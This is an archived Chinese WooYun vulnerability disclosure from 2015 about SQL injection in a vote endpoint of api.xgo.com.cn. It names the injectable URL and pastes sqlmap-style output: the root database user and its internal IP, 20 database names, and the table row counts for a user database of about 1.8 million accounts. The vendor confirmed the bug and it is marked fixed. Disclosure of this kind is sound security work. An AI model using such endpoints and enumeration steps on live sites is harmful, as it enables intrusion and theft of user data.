乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-06: 细节已通知厂商并且等待厂商处理中 2015-08-06: 厂商已经确认,细节仅向厂商公开 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
很重要的一个站,沦陷了后果很严重啊
站点
api.xgo.com.cn
旗下很多网站都是从这个站点获取数据,沦陷了就呵呵注入点
http://api.xgo.com.cn/vote_arrnew.php?voteid=82
root用户
[12:52:43] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5[12:52:43] [INFO] fetching database users[12:52:43] [WARNING] reflective value(s) found and filtering out[12:52:43] [INFO] the SQL query used returns 1 entries[12:52:43] [INFO] retrieved: 'root'@'192.168.50.40'database management system users [1]:[*] 'root'@'192.168.50.40'
数据库
available databases [20]:[*] information_schema[*] test[*] xgo_active[*] xgo_bbs[*] xgo_bbs_admin[*] xgo_bbs_troop[*] xgo_comment[*] xgo_picture[*] xgo_plugin[*] xgo_product[*] xgo_product_stat[*] xgo_review[*] xgo_stat_hits[*] xgo_tips[*] xgo_tips_admin[*] xgo_topic[*] xgo_tuan[*] xgo_user[*] xgo_yongpin[*] xgo_zhuqu
180W用户
Database: xgo_user+---------------------------+---------+| Table | Entries |+---------------------------+---------+| user_relations | 6387754 || userinfo | 1869916 || user_active_log | 1677306 || user_checkimg | 1476298 || user_album_pic | 911875 || user_check_mobile_code | 878586 || user_online | 484162 || user_real | 471549 || user_extend | 471537 || user_mail_set | 471455 || user_message_2011 | 413961 || user_message_2014 | 394551 || user_register_log | 323516 || user_message_2013 | 255437 || user_message | 244635 || user_album_info | 231716 || user_score | 226902 || user_check_mail_code | 221728 || user_oltime_2015 | 190457 || user_message_2012 | 156266 || user_oltime_2011 | 125514 || user_oltime_2013 | 125226 || userinfo_test | 123526 || userinfo_new | 111228 || user_visitor | 107855 || user_oltime_2012 | 93920 || user_oltime_2014 | 88678 || x_invite_code | 39950 || z_login_api | 37313 || z_api_token | 16951 || tag_from_pic | 6339 || tag_from_user | 6339 || user_car_list_product_rel | 5094 || x_user_score | 5021 || x_userinfo_extend | 5021 || x_log_login_2013 | 4974 || audit_log | 4824 || x_check_mail_code | 4688 || user_comments | 3538 || x_log_send_mail_2013 | 3012 || user_tag2 | 2890 || x_register_history | 2632 || user_album_pic_tags | 2571 || user_carport | 2502 || china_city | 2489 || x_check_mobile_code | 1926 || x_user_car | 1397 || x_log_login_2015 | 1245 || user_interest_doc0 | 1232 || user_book_collection | 1178 || x_log_login_2014 | 1101 || x_log_send_mail_2014 | 1080 || whitelistuser | 1043 || x_log_modify_pwd_2013 | 989 || user_obj_comments | 974 || tag | 938 || user_car_list | 924 || user_tag_num | 812 || x_register | 758 || x_log_send_mail_2015 | 689 || checkimg_group | 585 || china_town | 580 || gift_present | 425 || tag_user9 | 405 || tag_user1 | 388 || tag_user8 | 361 || x_oauth_bind | 348 || user_owner_info | 346 || tag_user7 | 339 || tag_user3 | 320 || user_hide | 312 || x_log_modify_pwd_2014 | 292 || tag_user5 | 287 || tag_user6 | 279 || z_login_api_bark | 279 || tag_user4 | 244 || gift_buy | 235 || tag_user2 | 232 || x_log_modify_pwd_2015 | 156 || user_interest_doc17 | 152 || user_car_list_vote_1 | 87 || tag_user10 | 70 || user_interest_doc18 | 39 || china_province | 35 || user_tag1 | 35 || gift | 32 || user_active_cate | 30 || user_rank | 9 || gift_sort | 6 || user_modify_pw_log | 5 || x_user_verify | 2 || xgo_qq_session | 2 |+---------------------------+---------+
见上,20rank不过分吧
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-08-06 16:03
已经修复
暂无